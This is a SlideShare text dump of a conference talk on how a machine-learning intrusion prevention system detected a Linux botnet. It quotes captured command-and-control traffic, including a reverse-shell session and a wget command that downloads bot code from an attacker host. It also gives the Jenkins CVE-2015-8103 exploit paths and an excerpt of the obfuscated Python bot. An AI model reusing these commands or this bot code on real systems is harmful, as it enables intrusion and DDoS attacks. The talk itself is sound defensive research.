SlideShare ist ein Scribd-Unternehmen logo
1 von 18
Downloaden Sie, um offline zu lesen
1
Robots againstRobots against
robots: How arobots: How a
Machine LearningMachine Learning
IDS detected aIDS detected a
novel Linux Botnetnovel Linux Botnet Sebastian GarciaSebastian Garcia
@eldracote@eldracote
sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz
https://stratosphereips.orghttps://stratosphereips.org
bit.ly/SS-RvRbit.ly/SS-RvR
2
The DetectionThe Detection
January 18th, 2016.January 18th, 2016.
Testing Stratosphere IPS in the University network.Testing Stratosphere IPS in the University network.
Have an alert from a malicious behavior in the IDS.Have an alert from a malicious behavior in the IDS.
147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]:
88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,
"For a long time there was a periodic connection (freq"For a long time there was a periodic connection (freq
5s-60s), to an uncommon port, with large flows of5s-60s), to an uncommon port, with large flows of
medium duration."medium duration."
3
The Analysis: VisibilityThe Analysis: Visibility
Argus flow suite from Qosient.Argus flow suite from Qosient.
Storage of 3,000 hosts continually (1 year ~= 80GB)Storage of 3,000 hosts continually (1 year ~= 80GB)
Back in time!Back in time!
4
The Detected ConnectionThe Detected Connection
Sent: "+.............P.43.249.81.135.......?."Sent: "+.............P.43.249.81.135.......?."
Recv: ".................................." (MBs)Recv: ".................................." (MBs)
Recv once: "import time as O000OO0O0O00OO00O"Recv once: "import time as O000OO0O0O00OO00O"
43.249.81.13543.249.81.135
No VirusTotal detection.No VirusTotal detection.
AS58879 Shanghai Anchang Network SecurityAS58879 Shanghai Anchang Network Security
Technology Co.,L. China.Technology Co.,L. China.
Last known domain: lyzqmir2.com. Minecraft server.Last known domain: lyzqmir2.com. Minecraft server.
5
The Begining: Jan 16th, 2016The Begining: Jan 16th, 2016
103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP [VT:7][VT:7]​​
S:"/bin/sh: 0: can't access tty; job control turned off.$,"S:"/bin/sh: 0: can't access tty; job control turned off.$,"
S:"S:"tomcat6tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep
abcc.$abcc.$
S:"wget 23.247.5.27:435/abcc.c"S:"wget 23.247.5.27:435/abcc.c"
R:"ps aux |grep abcc.ccd /tmp.m"R:"ps aux |grep abcc.ccd /tmp.m"
23.247.5.2723.247.5.27 portport 435435/TCP/TCP [VT:0][VT:0]
23.247.5.2723.247.5.27 portport 2500025000/TCP (main CC)/TCP (main CC)
"=...-== Love AV ==-:..Linux 3.2.0-4-amd64""=...-== Love AV ==-:..Linux 3.2.0-4-amd64"
6
The AnalysisThe Analysis
103.242.134.118103.242.134.118 portport 2303123031/TCP/TCP
​​""version:0.1"version:0.1"
"heartOK","hearta""heartOK","hearta"
"deployOK:115.239.248.88:80:3:60 heartOK""deployOK:115.239.248.88:80:3:60 heartOK"
103.242.134.118103.242.134.118 portport 3333333333/TCP/TCP
"http://222.179.116.23:8080/theme/1/pys.py""http://222.179.116.23:8080/theme/1/pys.py"
Python script?Python script?
7
Our computer Attacking?Our computer Attacking?
Hundreds of connections to IPs in China, port 80/UDP.Hundreds of connections to IPs in China, port 80/UDP.
115.239.248.88115.239.248.88 portport 8080//UDPUDP [MoveInternet Network[MoveInternet Network
Technology Co.,Ltd.,CN]Technology Co.,Ltd.,CN]
Few Kb ofFew Kb of binarybinary data sent.data sent.
Could not find a motive or explanation.Could not find a motive or explanation.
8
The CompromiseThe Compromise
What we knewWhat we knew
Tomcat involved.Tomcat involved.
Date range.Date range.
We found strange POSTs to Jenkins minutes beforeWe found strange POSTs to Jenkins minutes before
POST /jenkins/descriptor/hudson.model.DownloadService/byId/POST /jenkins/descriptor/hudson.model.DownloadService/byId/
hudson.tasks.Maven.MavenInstaller/postBackhudson.tasks.Maven.MavenInstaller/postBack
POST /jenkins/ajaxExecutorsPOST /jenkins/ajaxExecutors
Remote Jenkins code execution vulnerabilityRemote Jenkins code execution vulnerability
. Metasploit module.. Metasploit module.
CVE-CVE-
2015-81032015-8103
9
The Python Botnet ScriptThe Python Botnet Script
import time as O000OO0O0O00OO00O
import math as O000O0OO0O0O00O0O
import socket as OO0000OOOOOO0O000
import os as OO00000000OO000OO
import base64 as O0O0OOOO00O0O00OO
import threading as O00O000000OOO0OO0
import random as O0OOO0O000OO0O00O
class fbiabcd8c (O00O000000OOO0OO0 .Thread ):
def __init__ (O0000O0OOOOOOO0O0 ):
O00O000000OOO0OO0 .Thread .__init__ (O0000O0OOOOOOO0O0 )
def run (O0OO0OOOOO000O000 ):
global SvneciA
global fn023ca
global fABRVUqfh
if (fn023ca ==False ):
return
O00O0O00000OOO0OO =0
while fABRVUqfh :
O00O0O00000OOO0OO +=1
if (SvneciA >=O00O0O00000OOO0OO ):
O000OO0O0O00OO00O .sleep (1 )
else :
break
fABRVUqfh =False
try :
FcANECa .send (O0O0OOOO00O0O00OO .b64decode ("dWRwU3RvcHBlZA=="))
10
The Python Botnet ScriptThe Python Botnet Script
Obfuscated. Deobfuscated by Veronica Valeros. Thx!Obfuscated. Deobfuscated by Veronica Valeros. Thx!
Threads.Threads.
C&C channel withC&C channel with 10s timeouts.10s timeouts.
​​Receives orders and executes commands, includingReceives orders and executes commands, including
access to OS.access to OS.
Confuse analysts? or DDoS?Confuse analysts? or DDoS?
Function to send random UDP data to IPs receivedFunction to send random UDP data to IPs received
by C&C.by C&C.
11
How Machine LearningHow Machine Learning
detected this?detected this?
12
Stratosphere IPSStratosphere IPS
https://stratosphereips.org/https://stratosphereips.org/
FreeFree
SoftwareSoftware
MachineMachine
LearningLearning
BehavioralBehavioral
IPSIPS
ProtectingProtecting
NGOsNGOs
13
Stratosphere IPSStratosphere IPS
Model network behaviors as a string ofModel network behaviors as a string of lettersletters..
11 flowflow 33 featuresfeatures 11 letterletter
14
Behavior of ConnectionsBehavior of Connections
15
Markov Chains ModelsMarkov Chains Models
Create, train and store a Markov Chain modelsCreate, train and store a Markov Chain models
16
Behavioral DetectionBehavioral Detection
TrainedTrained
Markov ModelsMarkov Models
Similarity toSimilarity to
Unknown TrafficUnknown Traffic
17
ConclusionConclusion
Still unknown and hidden.Still unknown and hidden.
CouldCould notnot be detected by usual protections.be detected by usual protections.
No fingerprints, noNo fingerprints, no reputationsreputations, no rootkits., no rootkits.
ContinuousContinuous VisibilityVisibility is paramount.is paramount.
BehavioralBehavioral Machine Learning is improving.Machine Learning is improving.
18
Questions? And Thanks!Questions? And Thanks!
Sebastian GarciaSebastian Garcia
sebastian.garcia@agents.fel.cvut.czsebastian.garcia@agents.fel.cvut.cz
@eldracote@eldracote
Workshop Malware Traffic:Workshop Malware Traffic: bit.lybit.ly/SSdirtywork/SSdirtywork

Weitere ähnliche Inhalte

Was ist angesagt?

Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisApplication of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisPositive Hack Days
 
Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Michael Barker
 
PFDS 8.4.1
PFDS 8.4.1PFDS 8.4.1
PFDS 8.4.1rf0444
 
Programação completa e perfeira
Programação completa e perfeiraProgramação completa e perfeira
Programação completa e perfeiraMagno Rodrigues
 
Ugly code
Ugly codeUgly code
Ugly codeOdd-e
 
NUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialNUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialGagah Arifianto
 
How to write rust instead of c and get away with it
How to write rust instead of c and get away with itHow to write rust instead of c and get away with it
How to write rust instead of c and get away with itFlavien Raynaud
 
Next Generation Sequencing file Formats ( 2017 )
Next Generation Sequencing file Formats ( 2017 )Next Generation Sequencing file Formats ( 2017 )
Next Generation Sequencing file Formats ( 2017 )Pierre Lindenbaum
 
Javascript basics
Javascript basicsJavascript basics
Javascript basicsFin Chen
 
E-Commerce Security - Application attacks - Server Attacks
E-Commerce Security - Application attacks - Server AttacksE-Commerce Security - Application attacks - Server Attacks
E-Commerce Security - Application attacks - Server Attacksphanleson
 
Python and rust 2018 pythonkorea jihun
Python and rust 2018 pythonkorea jihunPython and rust 2018 pythonkorea jihun
Python and rust 2018 pythonkorea jihunJIHUN KIM
 
Ravada VDI Eslibre
Ravada VDI EslibreRavada VDI Eslibre
Ravada VDI Eslibrefrankiejol
 
Microcontroller (8051) general and simple alp n cprograms
Microcontroller (8051) general and simple alp n cprogramsMicrocontroller (8051) general and simple alp n cprograms
Microcontroller (8051) general and simple alp n cprogramsVedavyas PBurli
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 

Was ist angesagt? (20)

Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A AnalysisApplication of Radare2 Illustrated by Shylock and Snakso.A Analysis
Application of Radare2 Illustrated by Shylock and Snakso.A Analysis
 
Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!
 
Lalal
LalalLalal
Lalal
 
Javascript: The Important Bits
Javascript: The Important BitsJavascript: The Important Bits
Javascript: The Important Bits
 
PFDS 8.4.1
PFDS 8.4.1PFDS 8.4.1
PFDS 8.4.1
 
Programação completa e perfeira
Programação completa e perfeiraProgramação completa e perfeira
Programação completa e perfeira
 
Osol Pgsql
Osol PgsqlOsol Pgsql
Osol Pgsql
 
Ugly code
Ugly codeUgly code
Ugly code
 
NUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline TutorialNUMOSS 4th Week - Commandline Tutorial
NUMOSS 4th Week - Commandline Tutorial
 
Yg byev2e
Yg byev2eYg byev2e
Yg byev2e
 
gemdiff
gemdiffgemdiff
gemdiff
 
Php&redis presentation
Php&redis presentationPhp&redis presentation
Php&redis presentation
 
How to write rust instead of c and get away with it
How to write rust instead of c and get away with itHow to write rust instead of c and get away with it
How to write rust instead of c and get away with it
 
Next Generation Sequencing file Formats ( 2017 )
Next Generation Sequencing file Formats ( 2017 )Next Generation Sequencing file Formats ( 2017 )
Next Generation Sequencing file Formats ( 2017 )
 
Javascript basics
Javascript basicsJavascript basics
Javascript basics
 
E-Commerce Security - Application attacks - Server Attacks
E-Commerce Security - Application attacks - Server AttacksE-Commerce Security - Application attacks - Server Attacks
E-Commerce Security - Application attacks - Server Attacks
 
Python and rust 2018 pythonkorea jihun
Python and rust 2018 pythonkorea jihunPython and rust 2018 pythonkorea jihun
Python and rust 2018 pythonkorea jihun
 
Ravada VDI Eslibre
Ravada VDI EslibreRavada VDI Eslibre
Ravada VDI Eslibre
 
Microcontroller (8051) general and simple alp n cprograms
Microcontroller (8051) general and simple alp n cprogramsMicrocontroller (8051) general and simple alp n cprograms
Microcontroller (8051) general and simple alp n cprograms
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 

Ähnlich wie Robots against robots: How Machine Learning IDS detected a novel Linux Botnet

Docker - container and lightweight virtualization
Docker - container and lightweight virtualization Docker - container and lightweight virtualization
Docker - container and lightweight virtualization Sim Janghoon
 
Es werde Licht! Monitoring jenseits von tail und grep
Es werde Licht! Monitoring jenseits von tail und grepEs werde Licht! Monitoring jenseits von tail und grep
Es werde Licht! Monitoring jenseits von tail und grepOliver Fischer
 
Wireshar training
Wireshar trainingWireshar training
Wireshar trainingLuke Luo
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby SystemsEngine Yard
 
Locks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael BarkerLocks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael BarkerJAX London
 
marko_go_in_badoo
marko_go_in_badoomarko_go_in_badoo
marko_go_in_badooMarko Kevac
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbgArno Huetter
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardeningarchwisp
 
Open stack advanced_part
Open stack advanced_partOpen stack advanced_part
Open stack advanced_partlilliput12
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
A deep dive about VIP,HAIP, and SCAN
A deep dive about VIP,HAIP, and SCAN A deep dive about VIP,HAIP, and SCAN
A deep dive about VIP,HAIP, and SCAN Riyaj Shamsudeen
 
Linux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovLinux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovPivorak MeetUp
 
Eincop Netwax Lab: Access List ii
Eincop Netwax Lab: Access List iiEincop Netwax Lab: Access List ii
Eincop Netwax Lab: Access List iiNetwax Lab
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionFelipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Troubleshooting tips and tricks for Oracle Database Oct 2020
Troubleshooting tips and tricks for Oracle Database Oct 2020Troubleshooting tips and tricks for Oracle Database Oct 2020
Troubleshooting tips and tricks for Oracle Database Oct 2020Sandesh Rao
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentAnne Nicolas
 

Ähnlich wie Robots against robots: How Machine Learning IDS detected a novel Linux Botnet (20)

Docker - container and lightweight virtualization
Docker - container and lightweight virtualization Docker - container and lightweight virtualization
Docker - container and lightweight virtualization
 
Es werde Licht! Monitoring jenseits von tail und grep
Es werde Licht! Monitoring jenseits von tail und grepEs werde Licht! Monitoring jenseits von tail und grep
Es werde Licht! Monitoring jenseits von tail und grep
 
Wireshar training
Wireshar trainingWireshar training
Wireshar training
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
Debugging Ruby Systems
 
Locks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael BarkerLocks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael Barker
 
marko_go_in_badoo
marko_go_in_badoomarko_go_in_badoo
marko_go_in_badoo
 
Windows Debugging with WinDbg
Windows Debugging with WinDbgWindows Debugging with WinDbg
Windows Debugging with WinDbg
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging Ruby
 
Creating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server HardeningCreating "Secure" PHP applications, Part 2, Server Hardening
Creating "Secure" PHP applications, Part 2, Server Hardening
 
Open stack advanced_part
Open stack advanced_partOpen stack advanced_part
Open stack advanced_part
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
A deep dive about VIP,HAIP, and SCAN
A deep dive about VIP,HAIP, and SCAN A deep dive about VIP,HAIP, and SCAN
A deep dive about VIP,HAIP, and SCAN
 
Linux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene PirogovLinux Tracing Superpowers by Eugene Pirogov
Linux Tracing Superpowers by Eugene Pirogov
 
Eincop Netwax Lab: Access List ii
Eincop Netwax Lab: Access List iiEincop Netwax Lab: Access List ii
Eincop Netwax Lab: Access List ii
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Troubleshooting tips and tricks for Oracle Database Oct 2020
Troubleshooting tips and tricks for Oracle Database Oct 2020Troubleshooting tips and tricks for Oracle Database Oct 2020
Troubleshooting tips and tricks for Oracle Database Oct 2020
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
 
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel developmentKernel Recipes 2016 - Why you need a test strategy for your kernel development
Kernel Recipes 2016 - Why you need a test strategy for your kernel development
 

Mehr von Security Session

Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...
Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...
Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...Security Session
 
Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...
Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...
Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...Security Session
 
Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...
Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...
Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...Security Session
 
Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]
Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]
Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]Security Session
 
Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]
Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]
Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]Security Session
 
Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...
Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...
Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...Security Session
 
#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]
#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]
#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]Security Session
 
Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...
Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...
Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...Security Session
 
Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]
Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]
Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]Security Session
 
Exploitace – od minulosti po současnost - Jan Kopecký
Exploitace – od minulosti po současnost - Jan KopeckýExploitace – od minulosti po současnost - Jan Kopecký
Exploitace – od minulosti po současnost - Jan KopeckýSecurity Session
 
Kontrola uživatelských účtů ve Windows a jak ji obejít - Martin Dráb
Kontrola uživatelských účtů ve Windows a jak ji obejít - Martin DrábKontrola uživatelských účtů ve Windows a jak ji obejít - Martin Dráb
Kontrola uživatelských účtů ve Windows a jak ji obejít - Martin DrábSecurity Session
 
Research in Liveness Detection - Martin Drahanský
Research in Liveness Detection - Martin DrahanskýResearch in Liveness Detection - Martin Drahanský
Research in Liveness Detection - Martin DrahanskýSecurity Session
 
Dolování dat z řeči pro bezpečnostní aplikace - Jan Černocký
Dolování dat z řeči pro bezpečnostní aplikace - Jan ČernockýDolování dat z řeči pro bezpečnostní aplikace - Jan Černocký
Dolování dat z řeči pro bezpečnostní aplikace - Jan ČernockýSecurity Session
 
Co se skrývá v datovém provozu? - Pavel Minařík
Co se skrývá v datovém provozu? - Pavel MinaříkCo se skrývá v datovém provozu? - Pavel Minařík
Co se skrývá v datovém provozu? - Pavel MinaříkSecurity Session
 
Jak odesílat zprávy, když někdo vypne Internet - Pavel Táborský
Jak odesílat zprávy, když někdo vypne Internet - 	Pavel TáborskýJak odesílat zprávy, když někdo vypne Internet - 	Pavel Táborský
Jak odesílat zprávy, když někdo vypne Internet - Pavel TáborskýSecurity Session
 
Two Years with botnet Asprox - Michal Ambrož
Two Years with botnet Asprox - Michal AmbrožTwo Years with botnet Asprox - Michal Ambrož
Two Years with botnet Asprox - Michal AmbrožSecurity Session
 
Falsifikace biometricke charakteristiky a detekce zivosti
Falsifikace biometricke charakteristiky a detekce zivostiFalsifikace biometricke charakteristiky a detekce zivosti
Falsifikace biometricke charakteristiky a detekce zivostiSecurity Session
 

Mehr von Security Session (20)

Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...
Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...
Getting your hands dirty: How to Analyze the Behavior of Malware Traffic / SE...
 
Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...
Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...
Základy reverse engineeringu a assembleru / KAREL LEJSKA, MILAN BARTOŠ [DEFEN...
 
Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...
Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...
Zabezpečení nejen SSH na serveru pomocí Fail2Ban a jednoduchého honeypotu. / ...
 
Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]
Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]
Insights of a brute-forcing botnet / VERONICA VALEROS [CISCO]
 
Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]
Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]
Softwarove protektory / KAREL LEJSKA, MILAN BARTOŠ [DEFENDIO]
 
Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...
Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...
Wintel Hell: průvodce devíti kruhy Dantova technologického pekla / MARTIN HRO...
 
#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]
#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]
#ochranadat pred sebou samotným / MATEJ ZACHAR [SAFETICA TECHNOLOGIES S.R.O.]
 
Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...
Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...
Co vše skrývá síťový provoz a jak detekovat kybernetické hrozby? / MARTIN ŠKO...
 
Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]
Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]
Bezpečnější pošta díky protokolu DANE / ONDŘEJ CALETKA [CESNET]
 
Prezentace brno
Prezentace brnoPrezentace brno
Prezentace brno
 
OSINT and beyond
OSINT and beyondOSINT and beyond
OSINT and beyond
 
Exploitace – od minulosti po současnost - Jan Kopecký
Exploitace – od minulosti po současnost - Jan KopeckýExploitace – od minulosti po současnost - Jan Kopecký
Exploitace – od minulosti po současnost - Jan Kopecký
 
Kontrola uživatelských účtů ve Windows a jak ji obejít - Martin Dráb
Kontrola uživatelských účtů ve Windows a jak ji obejít - Martin DrábKontrola uživatelských účtů ve Windows a jak ji obejít - Martin Dráb
Kontrola uživatelských účtů ve Windows a jak ji obejít - Martin Dráb
 
Research in Liveness Detection - Martin Drahanský
Research in Liveness Detection - Martin DrahanskýResearch in Liveness Detection - Martin Drahanský
Research in Liveness Detection - Martin Drahanský
 
Dolování dat z řeči pro bezpečnostní aplikace - Jan Černocký
Dolování dat z řeči pro bezpečnostní aplikace - Jan ČernockýDolování dat z řeči pro bezpečnostní aplikace - Jan Černocký
Dolování dat z řeči pro bezpečnostní aplikace - Jan Černocký
 
Turris - Robert Šefr
Turris - Robert ŠefrTurris - Robert Šefr
Turris - Robert Šefr
 
Co se skrývá v datovém provozu? - Pavel Minařík
Co se skrývá v datovém provozu? - Pavel MinaříkCo se skrývá v datovém provozu? - Pavel Minařík
Co se skrývá v datovém provozu? - Pavel Minařík
 
Jak odesílat zprávy, když někdo vypne Internet - Pavel Táborský
Jak odesílat zprávy, když někdo vypne Internet - 	Pavel TáborskýJak odesílat zprávy, když někdo vypne Internet - 	Pavel Táborský
Jak odesílat zprávy, když někdo vypne Internet - Pavel Táborský
 
Two Years with botnet Asprox - Michal Ambrož
Two Years with botnet Asprox - Michal AmbrožTwo Years with botnet Asprox - Michal Ambrož
Two Years with botnet Asprox - Michal Ambrož
 
Falsifikace biometricke charakteristiky a detekce zivosti
Falsifikace biometricke charakteristiky a detekce zivostiFalsifikace biometricke charakteristiky a detekce zivosti
Falsifikace biometricke charakteristiky a detekce zivosti
 

Kürzlich hochgeladen

The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Women in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationWomen in Automation 2024: Career session - explore career paths in automation
Women in Automation 2024: Career session - explore career paths in automationDianaGray10
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdfHCI Lesson 1 - Introduction to Human-Computer Interaction.pdf
HCI Lesson 1 - Introduction to Human-Computer Interaction.pdfROWELL MARQUINA
 
React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...React JS; all concepts. Contains React Features, JSX, functional & Class comp...
React JS; all concepts. Contains React Features, JSX, functional & Class comp...Karmanjay Verma
 
Arti Languages Pre Seed Pitchdeck 2024.pdf
